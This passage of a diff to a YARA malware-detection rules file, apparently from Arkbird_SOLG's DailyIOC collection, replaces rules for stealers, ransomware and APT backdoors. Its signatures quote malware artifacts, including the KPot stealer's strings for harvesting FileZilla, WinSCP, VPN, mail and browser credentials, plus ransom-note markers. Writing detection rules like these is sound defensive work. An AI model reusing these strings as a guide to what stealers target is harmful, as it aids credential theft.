+		description = "Detect Stashlog malware"
 		author = "Arkbird_SOLG"
-		id = "0b65e333-16e2-57c3-84f0-5cd24c9d9593"
-		date = "2020-11-30"
-		modified = "2020-11-30"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-30/SP_Vault7_SIG_F_Nov_2020_1.yar#L1-L23"
+		id = "a6ae59df-c45a-5a31-8530-4fd7f0f33f93"
+		date = "2021-09-01"
+		modified = "2021-09-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-05/MAL_Stashlog_Sep_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "b03ffb433491b532d891f29aeb5b33c6578067f2f05845514a7bdc1e50f88a10"
-		score = 75
+		logic_hash = "6bde398a0f13674e72fcbd9809d22773bc1fe699f7c187775740d50910b07d5b"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "e6e17f2b2ce0ae07cf48654156b79ee90d330961456f731e84c94f50fe34f802"
-		hash2 = "c224ee5bef42a45e84e0d5a409d8b4c3842b2a7ac3fe5006ee795e64e0778e6e"
+		hash1 = "720610b9067c8afe857819a098a44cab24e9da5cf6a086351d01b73714afd397"
+		hash2 = "869165044402a5f82f4cb8ddd51663ebb05f86345f346f765dcc54b20706cf7c"
+		level = "experimental"
+		tlp = "White"
+		adversary = "-"
 
 	strings:
-		$dbg1 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 57 69 6e 4c 6f 67 6f 6e 20 6f 72 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 4e 57 47 49 4e 41 2e 44 4c 4c 2e 0a }
-		$dbg2 = { 54 68 65 20 65 6e 63 6f 64 65 64 20 70 61 73 73 77 6f 72 64 20 69 73 20 66 6f 75 6e 64 20 61 74 20 30 78 25 38 2e 38 6c 78 20 61 6e 64 20 68 61 73 20 61 20 6c 65 6e 67 74 68 20 6f 66 20 25 64 2e 0a }
-		$dbg3 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 69 6e 20 6d 65 6d 6f 72 79 2e 0a }
-		$dbg4 = { 20 55 73 61 67 65 3a 20 25 73 20 44 6f 6d 61 69 6e 4e 61 6d 65 20 55 73 65 72 4e 61 6d 65 20 50 49 44 2d 6f 66 2d 57 69 6e 4c 6f 67 6f 6e 0a 0a }
-		$dbg5 = { 54 68 65 20 6c 6f 67 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 69 73 3a 20 25 53 2f 25 53 2f 25 53 2e 0a }
-		$dbg6 = { 54 68 65 20 57 69 6e 4c 6f 67 6f 6e 20 70 72 6f 63 65 73 73 20 69 64 20 69 73 20 25 64 20 28 30 78 25 38 2e 38 6c 78 29 2e 0a }
-		$dbg7 = { 59 6f 75 20 6c 6f 67 67 65 64 20 6f 6e 20 61 74 20 25 64 2f 25 64 2f 25 64 20 25 64 3a 25 64 3a 25 64 0a }
-		$dbg8 = { 54 68 65 20 68 61 73 68 20 62 79 74 65 20 69 73 3a 20 30 78 25 32 2e 32 78 2e 0a }
-		$dbg9 = { 53 55 56 57 68 14 ?? 40 00 e8 17 0c 00 00 8b 6c 24 1c [1-4] 45 00 50 68 e0 ?? 40 00 e8 ?? ?? 00 00 83 c4 ?? e8 ?? 02 00 00 85 c0 75 1d e8 ?? 02 00 00 85 c0 75 14 68 b4 ?? 40 00 e8 ?? 0b 00 00 83 c4 04 33 c0 5f 5e 5d 5b }
+		$s1 = "497E724A7BA2764BB4570B225601FB693A796873E7847DB943F7FE9E7281C91A443DF1F8519CBB25FC736CC65BF3DE67A82E704BEB698E17" fullword ascii
+		$s2 = { 50 83 ec 0c 89 e0 31 c9 89 48 04 89 08 89 48 0c 89 48 08 50 ff 15 1c b2 42 00 c7 05 38 ac 44 00 01 00 00 00 50 83 ec 0c 89 e7 81 ec 04 01 00 00 31 c0 89 e3 89 47 04 89 07 89 47 0c 89 47 08 57 ff 15 1c b2 42 00 ff 25 64 5f 43 00 ff 25 6c 5f 43 00 0f b6 4f 0e 0f b6 47 0f 0f b6 57 0d 89 4d dc 0f b6 4f 0c 89 45 d8 89 55 e0 89 4d e4 ff 25 7c 5f 43 00 8b 4d f0 31 f6 46 31 e9 e8 94 48 01 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 a0 00 30 43 00 8a 15 01 30 43 00 8a 0d 02 30 43 00 f6 d0 80 f2 c1 80 f1 ec a2 40 30 43 00 88 15 41 30 43 00 8a 15 03 30 43 00 88 0d 42 30 43 00 8a 0d 04 30 43 00 80 f2 f4 80 f1 c4 88 15 43 30 43 00 8a 15 05 30 43 00 88 0d 44 30 43 00 8a 0d 06 30 43 00 80 f2 40 80 f1 24 88 15 45 30 43 00 88 0d 46 30 43 00 ff 25 34 5f 43 00 0f 10 05 08 30 43 00 0f 10 0d 18 30 43 00 a0 28 30 43 00 8a 15 29 30 43 00 8a 0d 2a 30 43 00 0f 57 05 80 b2 42 00 0f 57 0d 90 b2 42 00 34 e9 80 f2 10 80 f1 b3 0f 11 }
+		$s3 = { 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 31 c0 66 c7 84 24 ae 00 00 00 3a 00 50 6a 03 50 6a 01 68 00 00 00 80 53 ff 15 00 b2 42 00 ff 25 e8 a9 43 00 89 c7 31 c0 83 ff ff 0f 94 c0 ff 24 85 ec a9 43 00 c7 44 24 1c 00 00 00 00 ff 25 28 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f 29 44 24 60 0f 29 44 24 50 0f 29 44 24 40 0f 29 44 24 30 ff 25 30 aa 43 00 0f 57 c0 31 c0 89 84 24 a4 00 00 00 89 84 24 a0 00 00 00 0f 29 84 24 90 00 00 00 0f 29 84 24 80 00 00 00 0f 29 44 24 70 0f }
+		$s4 = { a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 a1 d8 b1 42 00 89 3b f2 0f 10 00 f2 0f 11 01 ff 25 68 1f 44 00 89 cb ff 25 70 1f 44 00 31 c9 85 c0 8b 06 8b 5e 0c 0f }
+		$s5 = { 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 31 c0 ff 75 0c ff 75 08 50 50 68 b0 74 43 00 53 ff 15 10 b0 42 00 89 c6 ff 25 70 b7 43 00 ff 37 ff 15 0c b0 42 00 8b 4d f0 31 e9 e8 a9 f6 00 00 89 f0 8d 65 f4 5e 5f 5b 5d c3 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 57 68 19 01 02 00 6a 00 68 70 74 43 00 68 02 00 00 80 ff 15 14 b0 42 00 ff 25 48 b7 43 00 55 }
 
 	condition:
-		uint16( 0 ) == 0x4d5a and filesize > 50KB and 6 of them
+		uint16( 0 ) == 0x5A4D and filesize > 20KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Ranzylocker_Hunting_Mar_2021_1 : FILE
+
+rule ARKBIRD_SOLG_Ransom_Ragnarlocker_July_2020_1 : FILE
 {
 	meta:
-		description = "Detect RanzyLocker ransomware"
+		description = "Detect Ragnarlocker by strings (July 2020)"
 		author = "Arkbird_SOLG"
-		id = "0d0c743b-9beb-5413-b5ba-dad75c2ee0b7"
-		date = "2021-03-16"
-		modified = "2021-03-17"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-16/RanzyLocker/Ran_RanzyLocker_Hunting_Mar_2021_1.yar#L1-L24"
+		id = "9291ed33-8d7d-5b88-9075-b847fdbab179"
+		date = "2020-07-30"
+		modified = "2020-07-30"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1288797666688851969"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-07-30/Yara_Ransom_Ragnarlocker_July_2020_1.yar#L3-L34"
 		license_url = "N/A"
-		logic_hash = "ec7867e40e4418bb662c8cf5a71566cd261d2040ee5d3afa0bbe2b92ebfef98e"
-		score = 50
-		quality = 53
+		logic_hash = "73d3be9a2d3b315ed6d3d93e2c6f9988d60234530b0398e8949c511f919a8954"
+		score = 75
+		quality = 23
 		tags = "FILE"
-		hash1 = "5d0af3bf0dc7d99fc87d844a0fcd99796b9257ba02d78510422c498d445f0d0d"
+		hash1 = "04c9cc0d1577d5ee54a4e2d4dd12f17011d13703cdd0e6efd46718d14fd9aa87"
 
 	strings:
-		$s1 = "-nolan" fullword wide
-		$s2 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 32 30 32 38 37 38 33 38 33 36 32 39 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
-		$s3 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
-		$s4 = { 32 32 37 33 37 35 36 32 36 39 36 34 32 32 33 41 32 32 00 00 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
-		$s5 = { 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
-		$s6 = { 32 32 36 35 37 38 37 34 32 32 33 41 32 32 }
-		$s7 = { 32 32 36 42 36 35 37 39 32 32 33 41 32 32 }
-		$s8 = { 32 32 36 45 36 35 37 34 37 37 36 46 37 32 36 42 32 32 33 41 32 32 }
-		$s9 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 36 32 36 46 36 46 37 34 37 33 37 34 36 31 37 34 37 35 37 33 37 30 36 46 36 43 36 39 36 33 37 39 32 30 36 39 36 37 36 45 36 46 37 32 36 35 36 31 36 43 36 43 36 36 36 31 36 39 36 43 37 35 37 32 36 35 37 33 }
-		$s10 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 37 32 36 35 36 33 36 46 37 36 36 35 37 32 37 39 36 35 36 45 36 31 36 32 36 43 36 35 36 34 32 30 34 45 36 46 }
-		$s11 = { 37 37 36 44 36 39 36 33 32 45 36 35 37 38 36 35 32 30 35 33 34 38 34 31 34 34 34 46 35 37 34 33 34 46 35 30 35 39 32 30 32 46 36 45 36 46 36 39 36 45 37 34 36 35 37 32 36 31 36 33 37 34 36 39 37 36 36 35 }
-		$s12 = { 35 33 34 46 34 36 35 34 35 37 34 31 35 32 34 35 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 35 43 34 35 35 32 34 39 34 34 }
-		$s13 = { 37 32 36 35 36 31 36 34 36 44 36 35 32 45 37 34 37 38 37 34 }
+		$f1 = "bootfont.bin" fullword wide
+		$f2 = "bootmgr.efi" fullword wide
+		$f3 = "bootsect.bak" fullword wide
+		$r1 = "$!.txt" fullword wide
+		$r2 = "---BEGIN KEY R_R---" fullword ascii
+		$r3 = "!$R4GN4R_" fullword wide
+		$r4 = "RAGNRPW" fullword ascii
+		$r5 = "---END KEY R_R---" fullword ascii
+		$a1 = "+RhRR!-uD8'O&Wjq1_P#Rw<9Oy?n^qSP6N{BngxNK!:TG*}\\|W]o?/]H*8z;26X0" fullword ascii
+		$a2 = "\\\\.\\PHYSICALDRIVE%d" fullword wide
+		$a3 = "WinSta0\\Default" fullword wide
+		$a4 = "%s-%s-%s-%s-%s" fullword wide
+		$a5 = "SOFTWARE\\Microsoft\\Cryptography" fullword wide
+		$c1 = "-backup" fullword wide
+		$c2 = "-force" fullword wide
+		$c3 = "-vmback" fullword wide
+		$c4 = "-list" fullword wide
+		$s1 = ".ragn@r_" fullword wide
+		$s2 = "\\notepad.exe" fullword wide
+		$s3 = "Opera Software" fullword wide
+		$s4 = "Tor browser" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 10 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and ( pe.imphash ( ) == "2c2aab89a4cba444cf2729e2ed61ed4f" and ( ( 2 of ( $f* ) ) and ( 3 of ( $r* ) ) and ( 4 of ( $a* ) ) and ( 2 of ( $c* ) ) and ( 2 of ( $s* ) ) ) )
 }
 rule ARKBIRD_SOLG_MAL_Sidoh_Stealer_Aug_2021_1 : FILE
 {
@@ -151396,1922 +152103,1805 @@ rule ARKBIRD_SOLG_MAL_Sidoh_Stealer_Aug_2021_1 : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and filesize > 20KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Kpot_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_Backdoor_APT_Nazar_April_2020_1 : FILE
 {
 	meta:
-		description = "Detect KPot stealer (new variant October 2020)"
+		description = "Detect strings used by APT Nazar"
 		author = "Arkbird_SOLG"
-		id = "316feeb3-59e5-5d18-9800-db41fabd6cb0"
-		date = "2020-10-17"
-		modified = "2020-10-17"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-17/MAL_KPot_Oct_2020_1.yar#L1-L40"
+		id = "727a1f4e-1371-5a95-bce9-4a4f701a2ac6"
+		date = "2020-04-29"
+		modified = "2023-11-22"
+		reference = "Internal research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-04-29/Yara_Rule_APT_Bazar-April_2020_1.yar#L3-L29"
 		license_url = "N/A"
-		logic_hash = "20010e8f2d45f904911664edee710f4dca18327c2b80766c253970a50624d13c"
+		logic_hash = "79028588ac6afd3e3d0d839d10eada9e5382991eebb600b0dae2119bcd7eac93"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		hash1 = "028ec268176707aadc2cf8e65a28236cbed214f9fd65fc3346ee34e859e50057"
+		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
 
 	strings:
-		$olds1 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" fullword ascii
-		$olds2 = "%s\\%s\\%s\\%.6s_%d.dat" fullword wide
-		$olds3 = "%s\\%s\\%s-Qt" fullword wide
-		$olds4 = "%s\\%s\\%.6ss" fullword wide
-		$olds5 = "%s\\%s\\%s.vdf" fullword wide
-		$olds6 = "https://%S/a/%S" fullword wide
-		$olds7 = { 4e 00 61 00 6d 00 65 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 43 00 6f 00 6d 00 6d 00 65 00 6e 00 74 00 3a 00 20 00 25 00 6c 00 73 00 0d 00 0a 00 55 00 73 00 65 00 72 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 44 00 61 00 74 00 61 00 3a 00 20 00 0d 00 0a 00 00 00 00 00 25 00 32 00 2e 00 32 00 58 00 20 00 00 00 00 00 25 00 2d 00 35 00 30 00 73 00 20 00 25 00 73 }
-		$debug1 = "4|Remote Desktop|%s|%s|%s|" fullword ascii
-		$debug2 = "1|TotalCommander|%s|%s|%s|" fullword ascii
-		$debug3 = "1|FileZilla|%s:%s|%s|%S|" fullword ascii
-		$debug4 = "5|Windows Mail|%s|%s|%s|" fullword ascii
-		$debug5 = "5|Outlook|%s:%d|%s|%s|" fullword ascii
-		$debug6 = "1|WS_FTP|%s|%s|%S|" fullword ascii
-		$debug7 = "1|WinSCP|%s|%s|%s|" fullword ascii
-		$debug8 = "3|Pidgin|%s|%s|%s|" fullword ascii
-		$debug9 = "3|Psi(+)|%s|%s|%s|" fullword ascii
-		$debug10 = "2|EarthVPN||%s|%s|" fullword ascii
-		$debug11 = "2|NordVPN||%s|%s|" fullword ascii
-		$debug12 = "0|%s|%S|%s|%s|%s" fullword ascii
-		$debug13 = "0|%S|%s|%s|%s|%S" fullword ascii
-		$debug14 = "0|%s|%s|%s|%s|" fullword ascii
-		$debug15 = "Masked|%s|%02d/%04d|%s|%s|%s" fullword ascii
-		$op1 = "{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1" fullword ascii
-		$op2 = { 25 73 0d 0a 25 73 0d 0a 56 69 73 69 74 73 20 63 6f 75 6e 74 3a 20 25 64 0d 0a 4c 61 73 74 20 76 69 73 69 74 3a 20 5b 25 64 2d 25 30 32 64 2d 25 30 32 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 5d 0d 0a 0d 0a 00 42 72 6f 77 73 65 72 73 5c 48 69 73 74 6f 72 79 5c 25 73 2e 74 78 74 00 42 72 6f 77 73 65 72 73 5c 41 75 74 6f 66 69 6c 6c 5c 25 73 2e 74 78 74 00 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 25 73 2e 74 78 74 }
-		$op3 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
-		$op4 = "monero-project" fullword ascii
+		$s1 = "101;0000;" fullword ascii
+		$s2 = "hodll.dll" fullword ascii
+		$s3 = { 70 73 73 64 6B ?? ?? 2E 73 79 73 }
+		$s4 = { 70 73 73 64 6B ?? ?? 2E 76 78 64 }
+		$s5 = "##$$%%&&''(())**++,,--..//0123456789:;<=>?" fullword ascii
+		$s6 = "SYSTEM\\CurrentControlSet\\Services\\VxD\\MSTCP" fullword ascii
+		$s7 = "removehook" fullword ascii
+		$s8 = "installhook" fullword ascii
+		$s9 = "_crt_debugger_hook" fullword ascii
+		$s10 = "\\Files.txt" fullword ascii
+		$s11 = "\\report.txt" fullword ascii
+		$s12 = "\\Programs.txt" fullword ascii
+		$s13 = "\\Devices.txt" fullword ascii
+		$s14 = "\\music.mp3" fullword ascii
+		$s15 = "\\z.png" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 120KB and 4 of ( $olds* ) and 10 of ( $debug* ) and 2 of ( $op* )
+		12 of them and filesize > 120KB
 }
-rule ARKBIRD_SOLG_APT_APT28_Downdelph_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Buran_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect Downdelph used by APT28 group"
+		description = "Detect Buran ransomware"
 		author = "Arkbird_SOLG"
-		id = "0376c026-93eb-526a-8ab3-26bdd365e608"
-		date = "2021-02-18"
-		modified = "2021-02-19"
-		reference = "https://twitter.com/RedDrip7/status/1362343352759250946"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-18/APT28/APT_APT28_Downdelph_Feb_2021_1.yar#L1-L18"
+		id = "dbdc251e-9ac6-5de1-8a72-72ac159daf4c"
+		date = "2020-11-05"
+		modified = "2020-11-06"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1323956405976600579"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-06/Buran/Ran_Buran_Oct_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "15e38ceeb0410645938ce2f90becf9a344711efd6e539f304de7b413f6f3b420"
+		logic_hash = "a6984d21451c980d001e040325c66b547060653ac97556bc379da40f3ab6a70a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ee7cfc55a49b2e9825a393a94b0baad18ef5bfced67531382e572ef8a9ecda4b"
+		hash1 = "66fc6e71a9c6be1f604c4a2d0650914f67c45d894fd1f76913e463079d47a8af"
+		hash2 = "93fe277d54f4baac5762412dda6f831bf6a612f166daade7c23f6b38feac94fb"
+		hash3 = "b3302c4a9fd06d9fde96c9004141f80e0a9107a9dead1659e77351f1b1c87cf6"
+		hash4 = "eb920e0fc0c360abb901e04dce172459b63bbda3ab8152350885db4b44d63ce5"
+		hash5 = "f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb"
+		hash6 = "29cdd5206422831334afa75c113b615bb8e0121254dd9a2196703ce6b1704ff8"
 
 	strings:
-		$s1 = { 53 [1-3] 81 c4 [2] ff ff 8b f2 8b ?? 54 8d 44 24 08 50 68 04 01 00 00 8b ?? e8 [12-22] 8d 54 24 04 8b c6 [73-133] 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 0c 89 01 89 51 04 8b 45 f0 33 d2 52 50 8b 45 e8 8b 55 ec e8 [3] ff 8b 4d 10 89 01 89 51 04 8b c3 5b 8b e5 5d }
-		$s2 = "cmd.exe /c " fullword ascii
-		$s3 = "Failed to Save Stream %s is already associated with %s=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
-		$s4 = { 53 00 79 00 73 00 74 00 65 00 6d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 5c 00 4b 00 65 00 79 00 62 00 6f 00 61 00 72 00 64 00 20 00 4c 00 61 00 79 00 6f 00 75 00 74 00 73 00 5c 00 25 00 2e 00 38 00 78 }
-		$s5 = { 4a 00 50 00 45 00 47 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 23 00 25 00 64 }
-		$s6 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
+		$s1 = "!!! LOCALPUBKEY !!!" fullword ascii
+		$s2 = "!!! ENCLOCALPRIVKEY !!!" fullword ascii
+		$s3 = "!!! D !!!" fullword ascii
+		$s4 = { 8b 85 74 fd ff ff 8b 40 04 85 c0 74 05 83 e8 04 8b 00 8d 55 f4 92 e8 c1 aa fe ff 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8d 45 f4 e8 d3 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 0c 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 45 f4 8b 95 74 fd ff ff 8b 52 04 e8 da a7 fe ff 0f 84 7d 07 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 74 fd ff ff 83 c0 04 e8 63 a8 fe ff 8b d0 8b cf 8b 85 50 fd ff ff 8b 38 ff 57 10 6a 00 6a 00 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8b 85 74 fd ff ff 8b 78 04 85 ff 74 05 83 ef 04 8b 3f 8b 85 50 fd ff ff 8b 10 ff 12 52 50 8b c7 99 03 85 48 fd ff ff 13 95 4c fd ff ff 3b 54 24 04 75 03 3b 04 24 5a 58 0f 85 dc 06 00 00 ff b5 4c fd ff ff ff b5 48 fd ff ff 8b 85 50 fd ff ff e8 e6 cc fe ff 8b 85 74 fd ff ff 8b 40 28 85 c0 74 09 83 f8 0a 0f 85 00 01 00 00 8b 85 74 fd ff ff 83 c0 1c e8 fe a2 fe ff 8b 85 74 fd ff ff 83 c0 20 e8 f0 a2 fe ff c7 85 44 fd ff ff 01 00 00 00 b8 00 01 00 00 e8 78 44 ff ff 8b d0 8d 85 10 fd ff ff e8 b7 a4 fe ff 8b 95 10 fd ff ff 8b 85 74 fd ff ff 83 c0 20 e8 63 a5 fe ff 83 bd 44 fd ff ff 10 7f 2b b8 00 01 00 00 e8 44 44 ff ff 8b d0 8d 85 0c fd ff ff e8 83 a4 fe ff 8b 95 0c fd ff ff 8b 85 74 fd ff ff 83 c0 1c e8 2f a5 fe ff ff 85 44 fd ff ff 83 bd 44 fd ff ff 21 75 92 8b 85 74 fd ff ff 83 c0 24 50 8b 85 74 fd ff ff 8b 48 1c 8b 85 74 fd ff ff 8b 50 20 8d 85 08 fd ff ff e8 45 a5 fe ff 8b 85 08 fd ff ff 8b 95 74 fd ff ff 8d 4a 0c 8b 95 74 fd ff ff 83 c2 14 e8 c8 8f ff ff 8d 95 04 fd ff ff 8b 85 74 fd ff ff 8b 40 24 e8 0c 5c ff ff 8b 95 04 fd ff ff 8b 85 74 fd ff ff 83 c0 24 e8 60 a2 fe ff 8b 85 74 fd ff ff 83 78 28 0a 75 0d 8b 85 74 fd ff ff 33 d2 89 50 28 eb 09 8b 85 74 fd ff ff ff 40 28 8b c3 99 52 50 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 54 b2 fe ff 89 85 38 fd ff ff 89 95 3c fd ff ff 8b c3 99 52 50 8b 85 38 fd ff ff 8b 95 3c fd ff ff e8 0e b2 fe ff 52 50 8b c6 99 3b 54 24 04 75 09 3b 04 24 5a 58 73 18 eb 04 5a 58 7d 12 8b c6 99 f7 fb 99 89 85 38 fd ff ff 89 95 3c fd ff ff 83 bd 3c fd ff ff 00 75 07 83 bd 38 fd ff ff 00 74 31 ff b5 3c fd ff ff ff b5 38 fd ff ff 8b 85 48 fd ff ff 8b 95 4c fd ff ff e8 d9 b1 fe ff 89 85 30 fd ff ff 89 95 34 fd ff ff 89 9d 2c fd ff ff eb 38 c7 85 38 fd ff ff 01 00 00 00 c7 85 3c fd ff ff 00 00 00 00 8b 85 48 fd ff ff 89 85 30 fd ff ff 8b 85 4c fd ff ff 89 85 34 fd ff ff 8b 85 48 fd ff ff 89 85 2c fd ff ff 8d 45 f0 e8 05 a1 fe ff b2 01 a1 98 6f 40 00 e8 61 94 fe ff 89 85 1c fd ff ff 8b 9d 38 fd ff ff 85 db 0f 8e 9f 00 00 00 c7 85 44 fd ff ff 01 00 00 00 ff b5 34 fd ff ff ff b5 30 fd ff ff 8b 85 44 fd ff ff 48 99 e8 1e b1 fe ff 89 85 20 fd ff ff 89 95 24 fd ff ff 8d 95 20 fd ff ff b9 08 00 00 00 8b 85 1c fd ff ff 8b 30 ff 56 10 ff b5 24 fd ff ff ff b5 20 fd ff ff 33 d2 8b 85 50 fd ff ff 8b 08 ff 51 18 8d 45 f4 8b 95 2c fd ff ff e8 19 a7 fe ff 8d 45 f4 e8 3d a5 fe ff 8b d0 8b 8d 2c fd ff ff 8b 85 50 fd ff ff e8 e6 ca fe ff 8d 45 f0 8b 55 f4 e8 fb a2 fe ff ff 85 44 fd ff ff 4b 0f 85 6b ff ff ff 6a 00 6a 00 33 d2 8b 85 1c fd ff ff 8b 08 ff 51 18 8d 45 ec e8 2d a0 fe ff 8b 85 1c fd ff ff 8b 10 ff 12 89 85 18 fd ff ff 8d 45 ec 8b 95 18 fd ff ff e8 af a6 fe ff 8d 45 ec e8 d3 a4 fe ff 8b d0 8b 8d 18 fd ff ff 8b 85 1c fd ff ff 8b 18 ff 53 }
+		$s5 = ": :(:,:0:4:8:<:@:D:H:\\:|:" fullword ascii
+		$s6 = " remove '.' from {.$DEFINE ComplexBraces}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 5 of them
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 4 of them
 }
-rule ARKBIRD_SOLG_MAL_ELF_Rotajakiro_May_2021_1 : FILE
+rule ARKBIRD_SOLG_Exp_Underminer_Apr_2021_1 : FILE
 {
 	meta:
-		description = "Detect the ELF version of RotaJakiro"
+		description = "Detect Underminer exploit kit"
 		author = "Arkbird_SOLG"
-		id = "a67f9b64-8778-542f-8481-566a4ffaf5e8"
-		date = "2020-05-07"
-		modified = "2021-05-08"
-		reference = "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-08/RotaJakiro/MAL_ELF_RotaJakiro_May_2021_1.yara#L1-L21"
+		id = "bd2a6b30-e05a-5f90-8dc2-719c1ba48a61"
+		date = "2021-04-14"
+		modified = "2021-04-15"
+		reference = "https://twitter.com/nao_sec/status/1382358986813415427"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-14/Underminer/Exp_Underminer_Apr_2021_1.yar#L1-L20"
 		license_url = "N/A"
